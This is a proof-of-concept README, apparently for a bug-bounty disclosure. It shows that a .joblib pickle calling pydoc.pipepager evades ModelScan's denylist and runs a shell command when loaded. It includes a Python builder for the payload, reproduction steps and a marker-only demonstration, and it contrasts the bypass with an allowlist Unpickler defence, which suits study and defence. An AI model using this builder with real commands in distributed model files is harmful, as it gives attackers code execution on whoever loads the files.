Joblib ModelScan Bypass PoC
This is a harmless proof of concept showing that a malicious .joblib model file passes a ModelScan scan as clean while still executing a shell command when it is loaded.
The payload is a pickle whose REDUCE call targets Python's standard-library pydoc.pipepager. pipepager(text, cmd) spawns cmd through the system shell (subprocess with shell=True) and writes text to its stdin, so the command runs as soon as joblib.load() deserializes the file; joblib imposes no restriction on which globals a pickle may import. ModelScan's pickle scanner reports zero issues because pydoc is not in its denylist of unsafe globals, so the GLOBAL pydoc pipepager reference is never flagged.
The payload command is deliberately harmless: it only writes modelscan_bypass_marker.txt, containing MODEL_SCAN_BYPASS, into the current working directory. Because verify_poc.py really executes the payload, run it from a scratch directory.
Files
- `poc_joblib_windows.joblib` - Windows PoC payload; harmless marker via `cmd /c`.
- `poc_joblib_posix.joblib` - Linux/macOS PoC payload; harmless marker via `sh -c`.
- `verify_poc.py` - runs ModelScan first, then loads the payload with `joblib.load()` and checks the marker.
- `requirements.txt` - tested with `modelscan==0.8.8` and `joblib==1.5.3`.
- `modelscan_result_pypi_windows.json` - primary Windows verification using PyPI `modelscan==0.8.8`: 0 issues, 0 errors.
- `modelscan_result_recheck_windows.json` - second Windows recheck showing the same bypass result.
- `modelscan_result_posix.json` - POSIX verification result.
- `generate_poc.py` - generates the `.joblib` payload files.
- `huntr_report_draft.md` - draft report text for Huntr.
Reproduce
Install runtime dependencies:
```
pip install joblib modelscan
```
Generate payloads:
```
python generate_poc.py --out-dir .
```
Verify on Windows:
```
python verify_poc.py --payload poc_joblib_windows.joblib
```
Verify on Linux/macOS:
```
python verify_poc.py --payload poc_joblib_posix.joblib
```
Expected result:
```
ModelScan issues: 0
ModelScan errors: 0
Marker created by joblib.load: True
Marker contents: MODEL_SCAN_BYPASS
```
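The following is an added, self-contained example and is not the repository's generate_poc.py or verify_poc.py. It hand-assembles the same kind of pickle the PoC relies on (GLOBAL pydoc pipepager followed by a REDUCE), lists every global the byte stream imports with pickletools, shows why a module-denylist check sees nothing, and contrasts that with an allowlist-based Unpickler that refuses the payload. The denylist and allowlist contents are constructed stand-ins for illustration, not ModelScan's real configuration, and the marker command is built for whichever shell Popen(shell=True) picks on the current platform.

```python
"""Added example (not the project's own code): build, inspect and contain the
pydoc.pipepager pickle payload that ModelScan's denylist does not flag."""
import io
import os
import pickle
import pickletools
import struct
import tempfile

MARKER_TEXT = "MODEL_SCAN_BYPASS"
MARKER_NAME = "modelscan_bypass_marker.txt"


def build_payload(cmd: str, text: str = "") -> bytes:
    """Protocol-2 pickle that calls pydoc.pipepager(text, cmd) when loaded.

    Opcodes: PROTO 2, GLOBAL pydoc pipepager, BINUNICODE text, BINUNICODE cmd,
    TUPLE2, REDUCE, STOP. pipepager runs cmd via the shell and only writes
    text to its stdin, so text can stay empty; cmd is what executes.
    """
    def binunicode(s: str) -> bytes:
        raw = s.encode("utf-8")
        return pickle.BINUNICODE + struct.pack("<I", len(raw)) + raw

    return (pickle.PROTO + b"\x02"
            + pickle.GLOBAL + b"pydoc\npipepager\n"
            + binunicode(text) + binunicode(cmd)
            + pickle.TUPLE2 + pickle.REDUCE + pickle.STOP)


def marker_command(marker_path: str) -> str:
    # Same harmless effect as the PoC. Popen(shell=True) uses /bin/sh on POSIX
    # and cmd.exe on Windows; this redirection form is accepted by both.
    return f'echo {MARKER_TEXT} > "{marker_path}"'


def imported_globals(payload: bytes) -> list:
    """Every (module, name) the stream imports via GLOBAL or STACK_GLOBAL.

    STACK_GLOBAL (protocol 4) takes module and name from the two most recent
    string pushes. This tracker follows plain string pushes only and does not
    model memo opcodes, so treat it as a triage aid, not a full stack emulator.
    """
    recent, found = [], []
    for op, arg, _pos in pickletools.genops(payload):
        if op.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            recent = (recent + [arg])[-2:]
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent) == 2:
            found.append((recent[0], recent[1]))
    return found


# Constructed stand-in for a module denylist; NOT ModelScan's actual list.
DENYLIST_MODULES = {"os", "posix", "nt", "subprocess", "sys", "builtins",
                    "shutil", "socket", "runpy"}


def denylist_hits(payload: bytes) -> list:
    """What a module-denylist scanner would flag: nothing for pydoc.pipepager."""
    return [g for g in imported_globals(payload)
            if g[0].split(".")[0] in DENYLIST_MODULES]


class AllowlistUnpickler(pickle.Unpickler):
    """Refuses any global not explicitly permitted. ALLOWED is a hypothetical
    minimum; a real loader lists exactly the classes its model type needs."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def allowlist_rejects(payload: bytes) -> bool:
    """True if the allowlist loader refuses the stream before any REDUCE runs."""
    try:
        AllowlistUnpickler(io.BytesIO(payload)).load()
    except pickle.UnpicklingError:
        return True
    return False


def detonate(payload: bytes, marker_path: str) -> bool:
    """Unrestricted load (what joblib.load does underneath); returns whether
    the marker appeared. Only call this with the harmless marker payload."""
    pickle.loads(payload)  # REDUCE -> pydoc.pipepager(text, cmd) -> shell
    if not os.path.exists(marker_path):
        return False
    with open(marker_path, encoding="utf-8", errors="replace") as fh:
        return MARKER_TEXT in fh.read()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, MARKER_NAME)
        payload = build_payload(marker_command(marker))
        print("globals imported :", imported_globals(payload))
        print("denylist hits    :", denylist_hits(payload))
        print("allowlist blocks :", allowlist_rejects(payload))
        print("marker created   :", detonate(payload, marker))
```

The point of the contrast: a denylist only ever catches the modules someone thought to list, while find_class-based allowlisting rejects pydoc.pipepager (and any other unlisted callable) before the REDUCE opcode can execute. A scanner that walks opcodes, as imported_globals does, still lets a defender see exactly which globals a model file pulls in before deciding whether to load it at all.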
Impact
A .joblib file that ModelScan reports as clean executes an arbitrary shell command the moment joblib.load() deserializes it. The gap is structural rather than a parsing bug: ModelScan matches imported globals against a denylist, so any standard-library callable that reaches a shell and is not on that list, pydoc.pipepager here, produces the same result. Until the scanner accounts for such callables, a clean ModelScan result should not be treated as permission to load a .joblib file from an untrusted source; loading through a restricted Unpickler that allowlists the expected globals, or not deserializing untrusted pickles at all, is the only reliable defence. This fits the high-value Model File Vulnerability category for scanner bypass and code execution through model loading.